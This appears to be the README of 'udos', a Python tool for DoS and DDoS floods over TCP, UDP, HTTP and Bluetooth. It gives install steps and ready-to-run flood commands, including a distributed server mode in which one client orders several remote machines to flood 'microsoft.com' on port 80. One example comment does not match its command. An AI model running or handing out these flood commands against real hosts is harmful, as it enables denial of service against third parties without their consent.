Universal DoS and DDoS testing tool, supports TCP, UDP, HTTP and RFCOMM
Python 100.00%
udos's Introduction
usage: udos [-h] [--version] [--fork] [--run] [--stop] [--debug]
[--socket SOCKET] [--client CLIENT] [--server] [--target TARGET]
[--port PORT] [--bytes BYTES]
UDoS for GNU/Linux - Universal DoS and DDoS testing tool
optional arguments:
-h, --help show this help message and exit
--version Display help
--fork Fork to background
--run Execute run on remote server (to be used with --client
argument)
--stop Stop previous job
--debug Debugging mode
--socket SOCKET use TCP or UDP connection over ethernet/wireless, default
TCP, available TCP, UDP, RFC (bluetooth)
--client CLIENT Connect to comma separated client addresses
--server turn into a server mode that handles instructions
--target TARGET target adress (bluetooth mac or ip adress over
ethernet/wireless)
--port PORT destination port
--bytes BYTES number of bytes to send in one packet
cd /tmp/
git clone https://github.com/Panthera-Framework/Panthera-Desktop
cd /tmp/Panthera-Desktop
sudo python2.7 ./setup.py install
cd /tmp/
git clone https://github.com/webnull/udos
cd /tmp/udos/
sudo python2.7 ./setup.py install
Examples:
$ udos --target 2.2.2.2 --port 21 --socket udp --bytes 1024 # TCP flood 1.1.1.1:80 with 1024 byte packets
$ udos --target 00:11:22:33:44 --socket rfc --bytes 668 # Bluetooth ping flood 00:11:22:33:44 with 668 byte packets
$ udos --target http://localhost --socket http --port 80 # HTTP GET flood on localhost, make many index.php requests as possible
Server mode examples:
server1$ udos --server --debug # Run first server with verboose output, it will listen on all interfaces
server2$ udos --server --debug # Run second server on other machine with ip eg. 8.8.8.2
Server's remote controlling:
client1$ udos --client "192.168.0.100:8020, 8.8.8.2:8020" --run --target microsoft.com --port 80 --socket http # set parameters and fire. Commands will be sent to two servers specified in --client
Changelog:
19.06.2014 (v.2.0) <[email protected]>:
+ Rewrited code using Panthera Desktop Framework
+ Server mode
14.08.2011 (v.1.2) <[email protected]>:
+ Added support for Python 3 (now works with Python 2.6, Python 2.7, Python 3.1 and Python 3.2)
+ Added check for l2ping
19.07.2011 (v.1.1.1):
+ Added versioning information
18.07.2011 (v1.1.1):
* Fixes and optimizations
18.07.2011 (v1.1):
+ Added support for HTTP GET flood
+ Created changelog